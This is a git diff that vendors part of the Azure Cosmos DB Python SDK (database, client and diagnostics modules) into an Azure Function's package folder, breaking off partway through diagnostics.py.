= kwargs.pop('response_hook', None) + if enable_cross_partition_query is not None: + feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + + if query: + # This is currently eagerly evaluated in order to capture the headers + # from the call. + # (just returning a generator did not initiate the first network call, so + # the headers were misleading) + # This needs to change for "real" implementation + query = query if parameters is None else dict(query=query, parameters=parameters) # type: ignore + result = self.client_connection.QueryDatabases(query=query, options=feed_options, **kwargs) + else: + result = self.client_connection.ReadDatabases(options=feed_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result + + @distributed_trace + def delete_database( + self, + database, # type: Union[str, DatabaseProxy, Dict[str, Any]] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> None + """Delete the database with the given ID (name). + + :param database: The ID (name), dict representing the properties or :class:`DatabaseProxy` + instance of the database to delete. + :type database: str or dict(str, str) or ~azure.cosmos.DatabaseProxy + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the database couldn't be deleted. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + database_link = self._get_database_link(database) + self.client_connection.DeleteDatabase(database_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + + @distributed_trace + def get_database_account(self, **kwargs): + # type: (Any) -> DatabaseAccount + """Retrieve the database account information. + + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A `DatabaseAccount` instance representing the Cosmos DB Database Account. + :rtype: ~azure.cosmos.DatabaseAccount + """ + response_hook = kwargs.pop('response_hook', None) + result = self.client_connection.GetDatabaseAccount(**kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py new file mode 100644 index 0000000..0498d54 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/database.py @@ -0,0 +1,808 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Interact with databases in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, cast, Iterable, Optional + +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .container import ContainerProxy +from .offer import ThroughputProperties +from .http_constants import StatusCodes +from .exceptions import CosmosResourceNotFoundError +from .user import UserProxy +from .documents import IndexingMode + +__all__ = ("DatabaseProxy",) + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class DatabaseProxy(object): + """An interface to interact with a specific database. + + This class should not be instantiated directly. Instead use the + :func:`CosmosClient.get_database_client` method. + + A database contains one or more containers, each of which can contain items, + stored procedures, triggers, and user-defined functions. + + A database can also have associated users, each of which is configured with + a set of permissions for accessing certain containers, stored procedures, + triggers, user-defined functions, or items. + + :ivar id: The ID (name) of the database. + + An Azure Cosmos DB SQL API database has the following system-generated + properties. These properties are read-only: + + * `_rid`: The resource ID. + * `_ts`: When the resource was last updated. The value is a timestamp. + * `_self`: The unique addressable URI for the resource. + * `_etag`: The resource etag required for optimistic concurrency control. + * `_colls`: The addressable path of the collections resource. + * `_users`: The addressable path of the users resource. + """ + + def __init__(self, client_connection, id, properties=None): # pylint: disable=redefined-builtin + # type: (CosmosClientConnection, str, Dict[str, Any]) -> None + """ + :param ClientSession client_connection: Client from which this database was retrieved. + :param str id: ID (name) of the database. + """ + self.client_connection = client_connection + self.id = id + self.database_link = u"dbs/{}".format(self.id) + self._properties = properties + + def __repr__(self): + # type () -> str + return "".format(self.database_link)[:1024] + + @staticmethod + def _get_container_id(container_or_id): + # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> str + if isinstance(container_or_id, str): + return container_or_id + try: + return cast("ContainerProxy", container_or_id).id + except AttributeError: + pass + return cast("Dict[str, str]", container_or_id)["id"] + + def _get_container_link(self, container_or_id): + # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> str + return u"{}/colls/{}".format(self.database_link, self._get_container_id(container_or_id)) + + def _get_user_link(self, user_or_id): + # type: (Union[UserProxy, str, Dict[str, Any]]) -> str + if isinstance(user_or_id, str): + return u"{}/users/{}".format(self.database_link, user_or_id) + try: + return cast("UserProxy", user_or_id).user_link + except AttributeError: + pass + return u"{}/users/{}".format(self.database_link, cast("Dict[str, str]", user_or_id)["id"]) + + def _get_properties(self): + # type: () -> Dict[str, Any] + if self._properties is None: + self._properties = self.read() + return self._properties + + @distributed_trace + def read(self, populate_query_metrics=None, **kwargs): + # type: (Optional[bool], Any) -> Dict[str, Any] + """Read the database properties. + + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :rtype: Dict[Str, Any] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given database couldn't be retrieved. + """ + # TODO this helper function should be extracted from CosmosClient + from .cosmos_client import CosmosClient + + database_link = CosmosClient._get_database_link(self) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + self._properties = self.client_connection.ReadDatabase( + database_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def create_container( + self, + id, # type: str # pylint: disable=redefined-builtin + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + unique_key_policy=None, # type: Optional[Dict[str, Any]] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Create a new container with the given ID (name). + + If a container with the given ID already exists, a CosmosResourceExistsError is raised. + + :param id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. If unspecified, items do not expire. + :param offer_throughput: The provisioned throughput for this offer. + :param unique_key_policy: The unique key policy to apply to the container. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :keyword analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :returns: A `ContainerProxy` instance representing the new container. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. + :rtype: ~azure.cosmos.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 0 + :caption: Create a container with default settings: + :name: create_container + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_container_with_settings] + :end-before: [END create_container_with_settings] + :language: python + :dedent: 0 + :caption: Create a container with specific settings; in this case, a custom partition key: + :name: create_container_with_settings + """ + definition = dict(id=id) # type: Dict[str, Any] + if partition_key is not None: + definition["partitionKey"] = partition_key + if indexing_policy is not None: + if indexing_policy.get("indexingMode") is IndexingMode.Lazy: + warnings.warn( + "Lazy indexing mode has been deprecated. Mode will be set to consistent indexing by the backend.", + DeprecationWarning + ) + definition["indexingPolicy"] = indexing_policy + if default_ttl is not None: + definition["defaultTtl"] = default_ttl + if unique_key_policy is not None: + definition["uniqueKeyPolicy"] = unique_key_policy + if conflict_resolution_policy is not None: + definition["conflictResolutionPolicy"] = conflict_resolution_policy + + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + if analytical_storage_ttl is not None: + definition["analyticalStorageTtl"] = analytical_storage_ttl + + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + data = self.client_connection.CreateContainer( + database_link=self.database_link, collection=definition, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ContainerProxy(self.client_connection, self.database_link, data["id"], properties=data) + + @distributed_trace + def create_container_if_not_exists( + self, + id, # type: str # pylint: disable=redefined-builtin + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + offer_throughput=None, # type: Optional[int] + unique_key_policy=None, # type: Optional[Dict[str, Any]] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Create a container if it does not exist already. + + If the container already exists, the existing settings are returned. + Note: it does not check or update the existing container settings or offer throughput + if they differ from what was passed into the method. + + :param id: ID (name) of container to read or create. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. If unspecified, items do not expire. + :param populate_query_metrics: Enable returning query metrics in response headers. + :param offer_throughput: The provisioned throughput for this offer. + :param unique_key_policy: The unique key policy to apply to the container. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :keyword analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :returns: A `ContainerProxy` instance representing the container. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container read or creation failed. + :rtype: ~azure.cosmos.ContainerProxy + """ + + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + try: + container_proxy = self.get_container_client(id) + container_proxy.read( + populate_query_metrics=populate_query_metrics, + **kwargs + ) + return container_proxy + except CosmosResourceNotFoundError: + return self.create_container( + id=id, + partition_key=partition_key, + indexing_policy=indexing_policy, + default_ttl=default_ttl, + populate_query_metrics=populate_query_metrics, + offer_throughput=offer_throughput, + unique_key_policy=unique_key_policy, + conflict_resolution_policy=conflict_resolution_policy, + analytical_storage_ttl=analytical_storage_ttl + ) + + @distributed_trace + def delete_container( + self, + container, # type: Union[str, ContainerProxy, Dict[str, Any]] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> None + """Delete a container. + + :param container: The ID (name) of the container to delete. You can either + pass in the ID of the container to delete, a :class:`ContainerProxy` instance or + a dict representing the properties of the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the container couldn't be deleted. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + collection_link = self._get_container_link(container) + result = self.client_connection.DeleteContainer(collection_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + def get_container_client(self, container): + # type: (Union[str, ContainerProxy, Dict[str, Any]]) -> ContainerProxy + """Get a `ContainerProxy` for a container with specified ID (name). + + :param container: The ID (name) of the container, a :class:`ContainerProxy` instance, + or a dict representing the properties of the container to be retrieved. + :returns: A `ContainerProxy` instance representing the retrieved database. + :rtype: ~azure.cosmos.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START get_container] + :end-before: [END get_container] + :language: python + :dedent: 0 + :caption: Get an existing container, handling a failure if encountered: + :name: get_container + """ + if isinstance(container, ContainerProxy): + id_value = container.id + else: + try: + id_value = container["id"] + except TypeError: + id_value = container + + return ContainerProxy(self.client_connection, self.database_link, id_value) + + @distributed_trace + def list_containers(self, max_item_count=None, populate_query_metrics=None, **kwargs): + # type: (Optional[int], Optional[bool], Any) -> Iterable[Dict[str, Any]] + """List the containers in the database. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of container properties (dicts). + :rtype: Iterable[dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START list_containers] + :end-before: [END list_containers] + :language: python + :dedent: 0 + :caption: List all containers in the database: + :name: list_containers + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + + result = self.client_connection.ReadContainers( + database_link=self.database_link, options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_containers( + self, + query=None, # type: Optional[str] + parameters=None, # type: Optional[List[str]] + max_item_count=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """List the properties for containers in the current database. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of container properties (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + feed_options["populateQueryMetrics"] = populate_query_metrics + + result = self.client_connection.QueryContainers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def replace_container( + self, + container, # type: Union[str, ContainerProxy, Dict[str, Any]] + partition_key, # type: Any + indexing_policy=None, # type: Optional[Dict[str, Any]] + default_ttl=None, # type: Optional[int] + conflict_resolution_policy=None, # type: Optional[Dict[str, Any]] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> ContainerProxy + """Reset the properties of the container. + + Property changes are persisted immediately. Any properties not specified + will be reset to their default values. + + :param container: The ID (name), dict representing the properties or + :class:`ContainerProxy` instance of the container to be replaced. + :param partition_key: The partition key to use for the container. + :param indexing_policy: The indexing policy to apply to the container. + :param default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :param conflict_resolution_policy: The conflict resolution policy to apply to the container. + :param populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be replaced. + This includes if the container with given id does not exist. + :returns: A `ContainerProxy` instance representing the container after replace completed. + :rtype: ~azure.cosmos.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START reset_container_properties] + :end-before: [END reset_container_properties] + :language: python + :dedent: 0 + :caption: Reset the TTL property on a container, and display the updated properties: + :name: reset_container_properties + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + + container_id = self._get_container_id(container) + container_link = self._get_container_link(container_id) + parameters = { + key: value + for key, value in { + "id": container_id, + "partitionKey": partition_key, + "indexingPolicy": indexing_policy, + "defaultTtl": default_ttl, + "conflictResolutionPolicy": conflict_resolution_policy, + }.items() + if value is not None + } + + container_properties = self.client_connection.ReplaceContainer( + container_link, collection=parameters, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, container_properties) + + return ContainerProxy( + self.client_connection, self.database_link, container_properties["id"], properties=container_properties + ) + + @distributed_trace + def list_users(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all the users in the container. + + :param max_item_count: Max number of users to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of user properties (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadUsers( + database_link=self.database_link, options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_users(self, query, parameters=None, max_item_count=None, **kwargs): + # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]] + """Return all users matching the given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of users to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of user properties (dicts). + :rtype: Iterable[str, Any] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.QueryUsers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + def get_user_client(self, user): + # type: (Union[str, UserProxy, Dict[str, Any]]) -> UserProxy + """Get a `UserProxy` for a user with specified ID. + + :param user: The ID (name), dict representing the properties or :class:`UserProxy` + instance of the user to be retrieved. + :returns: A `UserProxy` instance representing the retrieved user. + :rtype: ~azure.cosmos.UserProxy + """ + if isinstance(user, UserProxy): + id_value = user.id + else: + try: + id_value = user["id"] + except TypeError: + id_value = user + + return UserProxy(client_connection=self.client_connection, id=id_value, database_link=self.database_link) + + @distributed_trace + def create_user(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> UserProxy + """Create a new user in the container. + + To update or replace an existing user, use the + :func:`ContainerProxy.upsert_user` method. + + :param body: A dict-like object with an `id` key and value representing the user to be created. + The user ID must be unique within the database, and consist of no more than 255 characters. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A `UserProxy` instance representing the new user. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be created. + :rtype: ~azure.cosmos.UserProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START create_user] + :end-before: [END create_user] + :language: python + :dedent: 0 + :caption: Create a database user: + :name: create_user + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + user = self.client_connection.CreateUser( + database_link=self.database_link, user=body, options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, user) + + return UserProxy( + client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user + ) + + @distributed_trace + def upsert_user(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> UserProxy + """Insert or update the specified user. + + If the user already exists in the container, it is replaced. If the user + does not already exist, it is inserted. + + :param body: A dict-like object representing the user to update or insert. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A `UserProxy` instance representing the upserted user. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user could not be upserted. + :rtype: ~azure.cosmos.UserProxy + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + user = self.client_connection.UpsertUser( + database_link=self.database_link, user=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, user) + + return UserProxy( + client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user + ) + + @distributed_trace + def replace_user( + self, + user, # type: Union[str, UserProxy, Dict[str, Any]] + body, # type: Dict[str, Any] + **kwargs # type: Any + ): + # type: (...) -> UserProxy + """Replaces the specified user if it exists in the container. + + :param user: The ID (name), dict representing the properties or :class:`UserProxy` + instance of the user to be replaced. + :param body: A dict-like object representing the user to replace. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A `UserProxy` instance representing the user after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: + If the replace failed or the user with given ID does not exist. + :rtype: ~azure.cosmos.UserProxy + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + replaced_user = self.client_connection.ReplaceUser( + user_link=self._get_user_link(user), user=body, options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, replaced_user) + + return UserProxy( + client_connection=self.client_connection, + id=replaced_user["id"], + database_link=self.database_link, + properties=replaced_user + ) + + @distributed_trace + def delete_user(self, user, **kwargs): + # type: (Union[str, UserProxy, Dict[str, Any]], Any) -> None + """Delete the specified user from the container. + + :param user: The ID (name), dict representing the properties or :class:`UserProxy` + instance of the user to be deleted. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The user wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The user does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + result = self.client_connection.DeleteUser( + user_link=self._get_user_link(user), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace + def read_offer(self, **kwargs): + # type: (Any) -> ThroughputProperties + """Get the ThroughputProperties object for this database. + If no ThroughputProperties already exist for the database, an exception is raised. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: ThroughputProperties for the database. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exists for the container or + the throughput properties could not be retrieved. + :rtype: ~azure.cosmos.ThroughputProperties + """ + warnings.warn( + "read_offer is a deprecated method name, use read_throughput instead", + DeprecationWarning + ) + return self.get_throughput(**kwargs) + + @distributed_trace + def get_throughput(self, **kwargs): + # type: (Any) -> ThroughputProperties + """Get the ThroughputProperties object for this database. + If no ThroughputProperties already exist for the database, an exception is raised. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: ThroughputProperties for the database. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exists for the container or + the throughput properties could not be retrieved. + :rtype: ~azure.cosmos.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs)) + if not throughput_properties: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for database " + self.database_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + @distributed_trace + def replace_throughput(self, throughput, **kwargs): + # type: (Optional[int], Any) -> ThroughputProperties + """Replace the database-level throughput. + + :param throughput: The throughput to be set (an integer). + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: Offer for the database, updated with new throughput. + :returns: ThroughputProperties for the database, updated with new throughput. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: + If no offer exists for the database or if the offer could not be updated. + :rtype: ~azure.cosmos.Offer + If no throughput properties exists for the database or if the throughput properties could not be updated. + :rtype: ~azure.cosmos.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = list(self.client_connection.QueryOffers(query_spec)) + if not throughput_properties: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find ThroughputProperties for database " + self.database_link) + new_offer = throughput_properties[0].copy() + new_offer["content"]["offerThroughput"] = throughput + data = self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"], + offer=throughput_properties[0], **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py new file mode 100644 index 0000000..fc4076c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/diagnostics.py @@ -0,0 +1,86 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Diagnostic tools for Azure Cosmos database service operations. +""" + +from requests.structures import CaseInsensitiveDict + + +class RecordDiagnostics(object): + """Record Response headers from Cosmos read operations. + + The full response headers are stored in the ``headers`` property. + + Examples: + + >>> rh = RecordDiagnostics() + + >>> col = b.create_container( + ... id="some_container", + ... partition_key=PartitionKey(path='/id', kind='Hash'), + ... response_hook=rh) + + >>> rh.headers['x-ms-activity-id'] + '6243eeed-f06a-413d-b913-dcf8122d0642' + + """ + + _common = { + "x-ms-activity-id", + "x-ms-session-token", + "x-ms-item-count", + "x-ms-request-quota", + "x-ms-resource-usage", + "x-ms-retry-after-ms", + } + + def __init__(self): + self._headers = CaseInsensitiveDict() + self._body = None + self._request_charge = 0 + + @property + def headers(self): 